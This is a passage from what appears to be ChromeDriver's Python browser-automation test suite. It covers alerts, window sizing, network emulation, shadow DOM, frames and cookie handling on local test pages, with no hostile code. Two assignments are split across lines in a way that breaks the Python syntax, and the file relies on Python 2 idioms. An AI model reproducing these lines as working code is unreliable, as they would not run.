    """Text can be sent to prompt() but not to confirm()/beforeunload."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('prompt = window.prompt()')
    self.assertTrue(self._driver.IsAlertOpen())
    self._driver.HandleAlert(True, 'TextToPrompt')
    self.assertEquals('TextToPrompt',
                      self._driver.ExecuteScript('return prompt'))
    self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');')
    self.assertRaises(chromedriver.ElementNotInteractable,
                      self._driver.HandleAlert, True, 'textToConfirm')
    self._driver.HandleAlert(True) #for closing the previous alert.
    self._driver.ExecuteScript('window.onbeforeunload=function(){return true}')
    self._driver.FindElement('tag name', 'body').Click()
    self._driver.Refresh()
    self.assertTrue(self._driver.IsAlertOpen())
    self.assertRaises(chromedriver.UnsupportedOperation,
                      self._driver.HandleAlert, True, 'textToOnBeforeUnload')

  def testAlertOnNewWindow(self):
    """An alert fired on load of a new window can be dismissed."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    old_windows = self._driver.GetWindowHandles()
    self._driver.ExecuteScript("window.open('%s')" %
        self.GetHttpUrlForFile('/chromedriver/alert_onload.html'))
    new_window = self.WaitForNewWindow(self._driver, old_windows)
    self.assertNotEqual(None, new_window)
    self._driver.SwitchToWindow(new_window)
    self.assertTrue(self._driver.IsAlertOpen())
    self._driver.HandleAlert(False)
    self.assertFalse(self._driver.IsAlertOpen())

  def testShouldHandleNewWindowLoadingProperly(self):
    """Tests that ChromeDriver determines loading correctly for new windows."""
    self._http_server.SetDataForPath(
        '/newwindow',
        """
        <html>
        <body>
        <a href='%s' target='_blank'>new window/tab</a>
        </body>
        </html>""" % self._sync_server.GetUrl())
    self._driver.Load(self._http_server.GetUrl() + '/newwindow')
    old_windows = self._driver.GetWindowHandles()
    self._driver.FindElement('tag name', 'a').Click()
    new_window = 
self.WaitForNewWindow(self._driver, old_windows)
    self.assertNotEqual(None, new_window)
    # The original window finished loading; the new one (still blocked on the
    # sync server) must report loading until content is served.
    self.assertFalse(self._driver.IsLoading())
    self._driver.SwitchToWindow(new_window)
    self.assertTrue(self._driver.IsLoading())
    self._sync_server.RespondWithContent('<html>new window</html>')
    self._driver.ExecuteScript('return 1')  # Shouldn't hang.

  def testPopups(self):
    """window.open produces a new window handle."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    old_handles = self._driver.GetWindowHandles()
    self._driver.ExecuteScript('window.open("about:blank")')
    new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
    self.assertNotEqual(None, new_window_handle)

  def testNoSuchFrame(self):
    """Switching to a nonexistent frame raises NoSuchFrame."""
    self.assertRaises(chromedriver.NoSuchFrame,
                      self._driver.SwitchToFrame, 'nosuchframe')
    self.assertRaises(chromedriver.NoSuchFrame,
                      self._driver.SwitchToFrame,
                      self._driver.FindElement('tag name', 'body'))

  def testWindowPosition(self):
    """SetWindowRect with only x/y moves the window without resizing."""
    rect = self._driver.GetWindowRect()
    self._driver.SetWindowRect(None, None, rect[2], rect[3])
    self.assertEquals(rect, self._driver.GetWindowRect())

    # Resize so the window isn't moved offscreen.
    # See https://bugs.chromium.org/p/chromedriver/issues/detail?id=297.
    self._driver.SetWindowRect(640, 400, None, None)
    self._driver.SetWindowRect(None, None, 100, 200)
    self.assertEquals([640, 400, 100, 200], self._driver.GetWindowRect())

  def testWindowSize(self):
    """SetWindowRect with only width/height resizes without moving."""
    rect = self._driver.GetWindowRect()
    self._driver.SetWindowRect(rect[0], rect[1], None, None)
    self.assertEquals(rect, self._driver.GetWindowRect())

    self._driver.SetWindowRect(640, 400, None, None)
    self.assertEquals([640, 400, rect[2], rect[3]],
                      self._driver.GetWindowRect())

  def testWindowRect(self):
    """SetWindowRect applies the full rect and returns it as a dict."""
    old_window_rect = self._driver.GetWindowRect()
    self._driver.SetWindowRect(*old_window_rect)
    self.assertEquals(self._driver.GetWindowRect(), old_window_rect)

    target_window_rect = [640, 400, 100, 200]
    target_window_rect_dict = {'width': 640, 'height': 400, 'x': 100, 'y': 200}
    returned_window_rect = self._driver.SetWindowRect(*target_window_rect)
    self.assertEquals(self._driver.GetWindowRect(), target_window_rect)
    self.assertEquals(returned_window_rect, target_window_rect_dict)

  def testWindowMaximize(self):
    """Maximize changes the rect; a later SetWindowRect restores it."""
    old_rect_list = [640, 400, 100, 200]
    self._driver.SetWindowRect(*old_rect_list)
    new_rect = self._driver.MaximizeWindow()
    new_rect_list = [
        new_rect['width'],
        new_rect['height'],
        new_rect['x'],
        new_rect['y']
    ]
    self.assertNotEqual(old_rect_list, new_rect_list)

    self._driver.SetWindowRect(*old_rect_list)
    self.assertEquals(old_rect_list, self._driver.GetWindowRect())

  def testWindowMinimize(self):
    """Minimize returns the pre-minimize rect and sets state 'minimized'."""
    # Window handles are the DevTools target id with a "CDwindow-" prefix;
    # strip it to query Browser.getWindowForTarget directly.
    handle_prefix = "CDwindow-"
    handle = self._driver.GetCurrentWindowHandle()
    target = handle[len(handle_prefix):]
    self._driver.SetWindowRect(640, 400, 100, 200)
    rect = self._driver.MinimizeWindow()
    expected_rect = {u'y': 200, u'width': 640, u'height': 400, u'x': 100}

    # check it returned the correct rect
    for key in expected_rect.keys():
      self.assertEquals(expected_rect[key], rect[key])

    # check its minimized
    res = self._driver.SendCommandAndGetResult('Browser.getWindowForTarget',
                                               {'targetId': target})
    self.assertEquals('minimized', res['bounds']['windowState'])

  def testWindowFullScreen(self):
    """FullScreen changes the rect; SetWindowRect restores it (with retry)."""
    old_rect_list = [640, 400, 100, 200]
    self._driver.SetWindowRect(*old_rect_list)
    self.assertEquals(self._driver.GetWindowRect(), old_rect_list)
    new_rect = self._driver.FullScreenWindow()
    new_rect_list = [
        new_rect['width'],
        new_rect['height'],
        new_rect['x'],
        new_rect['y']
    ]
    self.assertNotEqual(old_rect_list, new_rect_list)

    self._driver.SetWindowRect(*old_rect_list)
    # Leaving fullscreen is asynchronous; poll up to ~1 s for the restore.
    for i in range(10):
      if old_rect_list == self._driver.GetWindowRect():
        break
      time.sleep(0.1)
    self.assertEquals(old_rect_list, self._driver.GetWindowRect())

  def testConsoleLogSources(self):
    """Browser log entries are tagged with their source (js/network)."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html'))
    logs = self._driver.GetLog('browser')
    self.assertEqual('javascript', logs[0]['source'])
    self.assertTrue('TypeError' in logs[0]['message'])

    self.assertEqual('network', logs[1]['source'])
    self.assertTrue('nonexistent.png' in logs[1]['message'])
    self.assertTrue('404' in logs[1]['message'])

    # Sometimes, we also get an error for a missing favicon.
    if len(logs) > 2:
      self.assertEqual('network', logs[2]['source'])
      self.assertTrue('favicon.ico' in logs[2]['message'])
      self.assertTrue('404' in logs[2]['message'])
      self.assertEqual(3, len(logs))
    else:
      self.assertEqual(2, len(logs))

  def testPendingConsoleLog(self):
    """console-api entries produced after the first GetLog are delivered."""
    new_logs = [""]
    def GetPendingLogs(driver):
      # Helper: fetch the browser log, keeping only console-api entries.
      response = driver.GetLog('browser')
      new_logs[0] = [x for x in response if x['source'] == 'console-api']
      return new_logs[0]

    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/pending_console_log.html'))
    logs = self._driver.GetLog('browser')
    self.assertEqual('console-api', logs[0]['source'])
    self.assertTrue('"InitialError" 2018 "Third"' in logs[0]['message'])

    self.WaitForCondition(lambda: len(GetPendingLogs(self._driver)) > 0 , 6)
    self.assertEqual('console-api', new_logs[0][0]['source'])
    self.assertTrue('"RepeatedError" "Second" "Third"'
                    in new_logs[0][0]['message'])

  def testGetLogOnClosedWindow(self):
    """GetLog must not raise after the current tab has been closed."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
    old_handles = 
self._driver.GetWindowHandles()
    self._driver.FindElement('css selector', '#link').Click()
    self.WaitForNewWindow(self._driver, old_handles)
    self._driver.CloseWindow()
    try:
      self._driver.GetLog('browser')
    except chromedriver.ChromeDriverException as e:
      self.fail('exception while calling GetLog on a closed tab: ' + e.message)

  def testGetLogOnWindowWithAlert(self):
    """GetLog must not raise while an alert is open."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('alert("alert!");')
    try:
      self._driver.GetLog('browser')
    except Exception as e:
      self.fail(e.message)

  def testDoesntHangOnDebugger(self):
    """A 'debugger' statement must not block command processing."""
    self._driver.Load('about:blank')
    self._driver.ExecuteScript('debugger;')

  def testChromeDriverSendLargeData(self):
    """A 10 MB script result round-trips intact."""
    script = 'return "0".repeat(10e6);'
    lots_of_data = self._driver.ExecuteScript(script)
    self.assertEquals('0'.zfill(int(10e6)), lots_of_data)

  def testEmulateNetworkConditions(self):
    """Set/Get/Delete of explicit network conditions works end to end."""
    # Network conditions must be set before it can be retrieved.
    self.assertRaises(chromedriver.UnknownError,
                      self._driver.GetNetworkConditions)

    # DSL: 2Mbps throughput, 5ms RTT
    latency = 5
    throughput = 2048 * 1024
    self._driver.SetNetworkConditions(latency, throughput, throughput)

    network = self._driver.GetNetworkConditions()
    self.assertEquals(latency, network['latency']);
    self.assertEquals(throughput, network['download_throughput']);
    self.assertEquals(throughput, network['upload_throughput']);
    self.assertEquals(False, network['offline']);

    # Network Conditions again cannot be retrieved after they've been deleted.
    self._driver.DeleteNetworkConditions()
    self.assertRaises(chromedriver.UnknownError,
                      self._driver.GetNetworkConditions)

  def testEmulateNetworkConditionsName(self):
    """Setting conditions by preset name ('DSL') applies the preset values."""
    # DSL: 2Mbps throughput, 5ms RTT
    # latency = 5
    # throughput = 2048 * 1024
    self._driver.SetNetworkConditionsName('DSL')

    network = self._driver.GetNetworkConditions()
    self.assertEquals(5, network['latency']);
    self.assertEquals(2048*1024, network['download_throughput']);
    self.assertEquals(2048*1024, network['upload_throughput']);
    self.assertEquals(False, network['offline']);

  def testEmulateNetworkConditionsSpeed(self):
    """Measured throughput stays within 1.5x of the configured limit."""
    # Warm up the browser.
    self._http_server.SetDataForPath(
        '/', "<html><body>blank</body></html>")
    self._driver.Load(self._http_server.GetUrl() + '/')

    # DSL: 2Mbps throughput, 5ms RTT
    latency = 5
    throughput_kbps = 2048
    throughput = throughput_kbps * 1024
    self._driver.SetNetworkConditions(latency, throughput, throughput)

    _32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F"
    _1_megabyte = _32_bytes * 32768
    self._http_server.SetDataForPath(
        '/1MB',
        "<html><body>%s</body></html>" % _1_megabyte)
    start = monotonic()
    self._driver.Load(self._http_server.GetUrl() + '/1MB')
    finish = monotonic()
    duration = finish - start
    actual_throughput_kbps = 1024 / duration
    # Allow a generous 1.5x band in both directions for timing noise.
    self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5)
    self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5)

  def testEmulateNetworkConditionsNameSpeed(self):
    """As above, but conditions configured via the 'DSL' preset name."""
    # Warm up the browser.
    self._http_server.SetDataForPath(
        '/', "<html><body>blank</body></html>")
    self._driver.Load(self._http_server.GetUrl() + '/')

    # DSL: 2Mbps throughput, 5ms RTT
    throughput_kbps = 2048
    throughput = throughput_kbps * 1024
    self._driver.SetNetworkConditionsName('DSL')

    _32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F"
    _1_megabyte = _32_bytes * 32768
    self._http_server.SetDataForPath(
        '/1MB',
        "<html><body>%s</body></html>" % _1_megabyte)
    start = monotonic()
    self._driver.Load(self._http_server.GetUrl() + '/1MB')
    finish = monotonic()
    duration = finish - start
    actual_throughput_kbps = 1024 / duration
    self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5)
    self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5)

  def testEmulateNetworkConditionsOffline(self):
    """Offline emulation makes navigation fail with an error page."""
    # A workaround for crbug.com/177511; when setting offline, the throughputs
    # must be 0.
    self._driver.SetNetworkConditions(0, 0, 0, offline=True)
    self.assertRaises(chromedriver.ChromeDriverException, self._driver.Load,
                      self.GetHttpUrlForFile('/chromedriver/page_test.html'))
    # The "X is not available" title is set after the page load event fires, so
    # we have to explicitly wait for this to change. We can't rely on the
    # navigation tracker to block the call to Load() above.
    self.WaitForCondition(lambda: 'is not available' in self._driver.GetTitle())

  def testSendCommandAndGetResult(self):
    """Sends a custom command to the DevTools debugger and gets the result"""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
    params = {}
    document = self._driver.SendCommandAndGetResult('DOM.getDocument', params)
    self.assertTrue('root' in document)

  def _FindElementInShadowDom(self, css_selectors):
    """Find an element inside shadow DOM using CSS selectors.
    The last item in css_selectors identify the element to find.
    All preceding selectors identify the hierarchy of shadow hosts to traverse
    in order to reach the target shadow DOM."""
    current = None
    for selector in css_selectors:
      if current is None:
        # First CSS selector, start from root DOM.
        current = self._driver
      else:
        # current is a shadow host selected previously.
        # Enter the corresponding shadow root.
        current = self._driver.ExecuteScript(
            'return arguments[0].shadowRoot', current)
      current = current.FindElement('css selector', selector)
    return current

  def testShadowDomFindElement(self):
    """Checks that chromedriver can find elements in a shadow DOM."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    self.assertTrue(self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#textBox"]))

  def testShadowDomFindChildElement(self):
    """Checks that chromedriver can find child elements from a shadow DOM
    element."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    elem = self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#childDiv"])
    self.assertTrue(elem.FindElement("css selector", "#textBox"))

  def testShadowDomFindElementFailsFromRoot(self):
    """Checks that chromedriver can't find elements in a shadow DOM from
    root."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    # can't find element from the root without /deep/
    with self.assertRaises(chromedriver.NoSuchElement):
      self._driver.FindElement("css selector", "#textBox")

  def testShadowDomText(self):
    """Checks that chromedriver can find extract the text from a shadow DOM
    element."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    elem = self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#heading"])
    self.assertEqual("Child", elem.GetText())

  def testShadowDomSendKeys(self):
    """Checks that chromedriver can call SendKeys on a shadow DOM element."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    elem = self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#textBox"])
    elem.SendKeys("bar")
    self.assertEqual("foobar", self._driver.ExecuteScript(
        'return arguments[0].value;', elem))

  def testShadowDomClear(self):
    """Checks that chromedriver can call Clear on a shadow DOM element."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    elem = self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#textBox"])
    elem.Clear()
    self.assertEqual("", self._driver.ExecuteScript(
        'return arguments[0].value;', elem))

  def testShadowDomClick(self):
    """Checks that chromedriver can call Click on an element in a shadow
    DOM."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    # Wait for page to stabilize. See https://crbug.com/954553#c7
    time.sleep(1)
    elem = self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#button"])
    elem.Click()
    # the button's onClicked handler changes the text box's value
    self.assertEqual("Button Was Clicked", self._driver.ExecuteScript(
        'return arguments[0].value;',
        self._FindElementInShadowDom(["#innerDiv", "#parentDiv", "#textBox"])))

  def testShadowDomActionClick(self):
    '''Checks that ChromeDriver can use actions API to click on an element
    in a shadow DOM.'''
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    # Wait for page to stabilize. See https://crbug.com/954553#c7
    time.sleep(1)
    elem = self._FindElementInShadowDom(
        ['#innerDiv', '#parentDiv', '#button'])
    actions = ({'actions': [{
        'type': 'pointer',
        'actions': [{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem},
                    {'type': 'pointerDown', 'button': 0},
                    {'type': 'pointerUp', 'button': 0}],
        'id': 'pointer1'}]})
    self._driver.PerformActions(actions)
    # the button's onClicked handler changes the text box's value
    self.assertEqual('Button Was Clicked', self._driver.ExecuteScript(
        'return arguments[0].value;',
        self._FindElementInShadowDom(['#innerDiv', '#parentDiv', '#textBox'])))

  def testShadowDomStaleReference(self):
    """Checks that trying to manipulate shadow DOM elements that are detached
    from the document raises a StaleElementReference exception"""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    elem = self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#button"])
    self._driver.ExecuteScript(
        'document.querySelector("#outerDiv").innerHTML="<div/>";')
    with self.assertRaises(chromedriver.StaleElementReference):
      elem.Click()

  def testTouchDownMoveUpElement(self):
    """touchstart/touchmove/touchend fire for TouchDown/Move/Up."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    target = self._driver.FindElement('css selector', '#target')
    location = target.GetLocation()
    self._driver.TouchDown(location['x'], location['y'])
    events = self._driver.FindElement('css selector', '#events')
    self.assertEquals('events: touchstart', events.GetText())
    self._driver.TouchMove(location['x'] + 1, location['y'] + 1)
    self.assertEquals('events: touchstart touchmove', events.GetText())
    self._driver.TouchUp(location['x'] + 1, location['y'] + 1)
    self.assertEquals('events: touchstart touchmove touchend',
                      events.GetText())

  def testGetElementRect(self):
    """GetRect returns the absolutely positioned element's rect."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/absolute_position_element.html'))
    target = self._driver.FindElement('css selector', '#target')
    rect = target.GetRect()
    self.assertEquals(18, rect['x'])
    self.assertEquals(10, rect['y'])
    self.assertEquals(200, rect['height'])
    self.assertEquals(210, rect['width'])

  def testTouchFlickElement(self):
    """TouchFlick produces the expected number of touchmove events."""
    dx = 3
    dy = 4
    speed = 5
    flickTouchEventsPerSecond = 30
    # Expected touchmove count = distance / speed * events-per-second.
    moveEvents = int(
        math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    # The page counts touchmoves in the div text; touchend replaces the text
    # with "new<br>" only when the exact expected count was observed.
    div = self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.addEventListener("touchstart", function() {'
        '  div.innerHTML = "preMove0";'
        '});'
        'div.addEventListener("touchmove", function() {'
        '  res = div.innerHTML.match(/preMove(\d+)/);'
        '  if (res != null) {'
        '    div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);'
        '  }'
        '});'
        'div.addEventListener("touchend", function() {'
        '  if (div.innerHTML == "preMove' + str(moveEvents) + '") {'
        '    div.innerHTML = "new<br>";'
        '  }'
        '});'
        'return div;')
    self._driver.TouchFlick(div, dx, dy, speed)
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testSwitchesToTopFrameAfterNavigation(self):
    """Navigating while in a frame resets the context to the top frame."""
    self._driver.Load('about:blank')
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
    p = self._driver.FindElement('tag name', 'p')
    self.assertEquals('Two', p.GetText())

  def testSwitchesToTopFrameAfterRefresh(self):
    """Refresh while in a frame resets the context to the top frame."""
    self._driver.Load('about:blank')
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame)
    self._driver.Refresh()
    p = self._driver.FindElement('tag name', 'p')
    self.assertEquals('Two', p.GetText())

  def testSwitchesToTopFrameAfterGoingBack(self):
    """GoBack while in a frame resets the context to the top frame."""
    self._driver.Load('about:blank')
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html'))
    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame)
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/inner.html'))
    self._driver.GoBack()
    p = self._driver.FindElement('tag name', 'p')
    self.assertEquals('Two', p.GetText())

  def testCanSwitchToPrintPreviewDialog(self):
    """The print preview window appears as a switchable window handle."""
    # NOTE(review): the `print >>` statements below are Python 2 syntax; this
    # file appears to target Python 2 — confirm before porting to Python 3.
    old_handles = self._driver.GetWindowHandles()
    print >> sys.stdout, "Test debug: actual len of old_handles: " \
        + str(len(old_handles))
    self.assertEquals(1, len(old_handles))
    self._driver.ExecuteScript('setTimeout(function(){window.print();}, 0);')
    new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
    if new_window_handle is None:
      print >> sys.stdout, "Test debug: new_window_handle is None"
    else:
      print >> sys.stdout, "Test debug: new_window_handle is not None"
    self.assertNotEqual(None, new_window_handle)
    self._driver.SwitchToWindow(new_window_handle)
    print >> sys.stdout, "Test debug: actual GetCurrentUrl: " \
        + self._driver.GetCurrentUrl()
    self.assertEquals('chrome://print/', self._driver.GetCurrentUrl())

  def testCanClickInIframes(self):
    """Clicks work both in the top frame and inside nested iframes."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
    a = self._driver.FindElement('tag name', 'a')
    a.Click()
    frame_url = self._driver.ExecuteScript('return window.location.href')
    self.assertTrue(frame_url.endswith('#one'))
    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame)
    a = self._driver.FindElement('tag name', 'a')
    a.Click()
    frame_url = self._driver.ExecuteScript('return window.location.href')
    self.assertTrue(frame_url.endswith('#two'))

  def testDoesntHangOnFragmentNavigation(self):
    """Same-document (#fragment) navigation must not block."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html#x'))

  def SetCookie(self, request):
    """HTTP handler: serve a page that sets an HttpOnly cookie."""
    return {'Set-Cookie': 'x=y; HttpOnly'}, "<!DOCTYPE html><html></html>"

  def testGetHttpOnlyCookie(self):
    """GetCookies reports the httpOnly flag correctly."""
    self._http_server.SetCallbackForPath('/setCookie', self.SetCookie)
    self._driver.Load(self.GetHttpUrlForFile('/setCookie'))
    self._driver.AddCookie({'name': 'a',
                            'value': 'b'})
    cookies = self._driver.GetCookies()
    self.assertEquals(2, len(cookies))
    for cookie in cookies:
      self.assertIn('name', cookie)
      if cookie['name'] == 'a':
        self.assertFalse(cookie['httpOnly'])
      elif cookie['name'] == 'x':
        self.assertTrue(cookie['httpOnly'])
      else:
        self.fail('unexpected cookie: %s' % json.dumps(cookie))

  def testCookiePath(self):
    """AddCookie defaults path to '/' and honors an explicit path."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/long_url/empty.html'))
    self._driver.AddCookie({'name': 'a', 'value': 'b'})
    self._driver.AddCookie({
        'name': 'x', 'value': 'y', 'path': '/chromedriver/long_url'})
    cookies = self._driver.GetCookies()
    self.assertEquals(2, len(cookies))
    for cookie in cookies:
      self.assertIn('path', cookie)
      if cookie['name'] == 'a':
        self.assertEquals('/' , cookie['path'])
      if cookie['name'] == 'x':
        self.assertEquals('/chromedriver/long_url' , cookie['path'])

  def testGetNamedCookie(self):
    """GetNamedCookie returns the cookie or raises NoSuchCookie."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/empty.html'))
    self._driver.AddCookie({'name': 'a', 'value': 'b'})
    named_cookie = self._driver.GetNamedCookie('a')
    self.assertEquals('a' , named_cookie['name'])
    self.assertEquals('b' , named_cookie['value'])
    self.assertRaisesRegexp(
        chromedriver.NoSuchCookie, "no such cookie",
        self._driver.GetNamedCookie, 'foo')

  def testDeleteCookie(self):
    """DeleteCookie removes one cookie; DeleteAllCookies removes the rest."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/empty.html'))
    self._driver.AddCookie({'name': 'a', 'value': 'b'})
    self._driver.AddCookie({'name': 'x', 'value': 'y'})
    self._driver.AddCookie({'name': 'p', 'value': 'q'})
    cookies = self._driver.GetCookies()
    self.assertEquals(3, len(cookies))
    self._driver.DeleteCookie('a')
    self.assertEquals(2, len(self._driver.GetCookies()))
    self._driver.DeleteAllCookies()
    self.assertEquals(0, len(self._driver.GetCookies()))

  def testCookieForFrame(self):
    """Cookie commands operate on the current frame's (cross-origin) context."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/cross_domain_iframe.html'))
    self._driver.AddCookie({'name': 'outer', 'value': 'main context'})

    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame)
    self.assertTrue(self.WaitForCondition(
        lambda: 'outer.html' in
                self._driver.ExecuteScript('return window.location.href')))
    self._driver.AddCookie({'name': 'inner', 'value': 'frame context'})
    # Inside the cross-origin frame only the frame's cookie is visible.
    cookies = self._driver.GetCookies()
    self.assertEquals(1, len(cookies))
    self.assertEquals('inner', cookies[0]['name'])
    self._driver.SwitchToMainFrame()
    # Back in the main frame only the outer cookie is visible.
    cookies = self._driver.GetCookies()
    self.assertEquals(1, len(cookies))
    self.assertEquals('outer', cookies[0]['name'])

  def testCanClickAlertInIframes(self):
    """An alert raised from inside an iframe can be accepted."""
    # This test requires that the page be loaded from a file:// URI, rather than
    # the test HTTP server.
    # NOTE(review): urllib.pathname2url is Python 2; in Python 3 it lives in
    # urllib.request — confirm the intended interpreter before porting.
    path = os.path.join(chrome_paths.GetTestData(), 'chromedriver',
                        'page_with_frame.html')
    url = 'file://' + urllib.pathname2url(path)
    self._driver.Load(url)
    frame = self._driver.FindElement('css selector', '#frm')
    self._driver.SwitchToFrame(frame)
    a = self._driver.FindElement('css selector', '#btn')
    a.Click()
    self.WaitForCondition(lambda: self._driver.IsAlertOpen())
    self._driver.HandleAlert(True)

  def testThrowErrorWithExecuteScript(self):
    """A thrown JS Error surfaces as JavaScriptError with its message."""
    self.assertRaisesRegexp(
        chromedriver.JavaScriptError, "some error",
        self._driver.ExecuteScript, 'throw new Error("some error")')

  def testDoesntCrashWhenScriptLogsUndefinedValue(self):
    # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547
    self._driver.ExecuteScript('var b; console.log(b);')

  def testDoesntThrowWhenPageLogsUndefinedValue(self):
    # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/log_undefined_value.html'))

  def testCanSetCheckboxWithSpaceKey(self):
    """Sending the space key toggles a focused checkbox."""
    self._driver.Load('about:blank')
    self._driver.ExecuteScript(
        "document.body.innerHTML = '<input type=\"checkbox\">';")
    checkbox = self._driver.FindElement('tag name', 'input')
    self.assertFalse(
        self._driver.ExecuteScript('return arguments[0].checked', checkbox))
    checkbox.SendKeys(' ')
    self.assertTrue(
        self._driver.ExecuteScript('return arguments[0].checked', checkbox))

  def testElementReference(self):
    """In W3C mode element ids are 36-char (UUID-length) references."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/element_ref.html'))
    element = self._driver.FindElement('css selector', '#link')
    self._driver.FindElements('tag name', 'br')
    w3c_id_length = 36
    if (self._driver.w3c_compliant):
      self.assertEquals(len(element._id), w3c_id_length)

  def testFindElementWhenElementIsOverridden(self):
    """FindElements works even when the page clobbers window.Element."""
    self._driver.Load('about:blank')
    self._driver.ExecuteScript(
        'document.body.appendChild(document.createElement("a"));')
    self._driver.ExecuteScript('window.Element = {}')
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))

  def testExecuteScriptWhenObjectPrototypeIsModified(self):
    # Some JavaScript libraries (e.g. MooTools) do things like this. For
    # context see https://bugs.chromium.org/p/chromedriver/issues/detail?id=1521
    self._driver.Load('about:blank')
    self._driver.ExecuteScript('Object.prototype.$family = undefined;')
    self.assertEquals(1, self._driver.ExecuteScript('return 1;'))

  def testWebWorkerFrames(self):
    """Verify web worker frames are handled correctly.

    Regression test for bug
    https://bugs.chromium.org/p/chromedriver/issues/detail?id=2340.
    The bug was triggered by opening a page with web worker, and then opening
    a page on a different site. We simulate a different site by using
    'localhost' as the host name (default is '127.0.0.1').
    """
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/web_worker.html'))
    self._driver.Load(self._http_server.GetUrl('localhost')
                      + '/chromedriver/empty.html')

  def testWaitForCurrentFrameToLoad(self):
    """Verify ChromeDriver waits for loading events of current frame

    Regression test for bug
    https://bugs.chromium.org/p/chromedriver/issues/detail?id=3164
    Clicking element in frame triggers reload of that frame, click should not
    return until loading is complete.
    """
    def waitAndRespond():
      # Serve the frame's new content only after a short delay so a premature
      # return from Click() would observe the stale value.
      # test may not detect regression without small sleep.
      # locally, .2 didn't fail before code change, .3 did
      time.sleep(.5)
      self._sync_server.RespondWithContent(
          """
          <html>
          <body>
          <p id='valueToRead'>11</p>
          </body>
          </html>
          """)
    self._http_server.SetDataForPath('/page10.html',
        """
        <html>
        <head>
        <title> Frame </title>
        <script>
        function reloadWith(i) {
          window.location.assign('%s');
        }
        </script>
        </head>
        <body>
        <button id='prev' onclick="reloadWith(9)">-1</button>
        <button id='next' onclick="reloadWith(11)">+1</button>
        <p id='valueToRead'>10</p>
        </body>
        </html>
        """ % self._sync_server.GetUrl())
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/page_for_next_iframe.html'))
    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame);
    thread = threading.Thread(target=waitAndRespond)
    thread.start()
    self._driver.FindElement('css selector', '#next').Click()
    value_display = self._driver.FindElement('css selector', '#valueToRead')
